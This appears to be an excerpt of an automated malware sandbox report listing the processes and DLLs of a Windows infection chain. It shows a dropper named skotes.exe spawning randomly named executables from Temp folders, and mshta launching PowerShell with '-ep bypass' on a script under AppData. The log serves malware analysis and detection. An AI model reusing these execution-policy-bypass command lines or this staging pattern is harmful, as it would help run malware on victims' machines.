Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2272 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7420 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe "C:\Users\user\AppData\Local\Temp\1005627001\file1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1005628041\k4pDgO.ps1"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe "C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe "C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe "C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\ojHpUJVY2.ps1 "
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: winmm.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wininet.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: mstask.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wldp.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: mpr.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: dui70.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: duser.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: chartv.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: winsta.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: propsys.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: profapi.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: edputil.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: netutils.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: slc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: userenv.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: sppc.dll
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Section loaded: netutils.dll
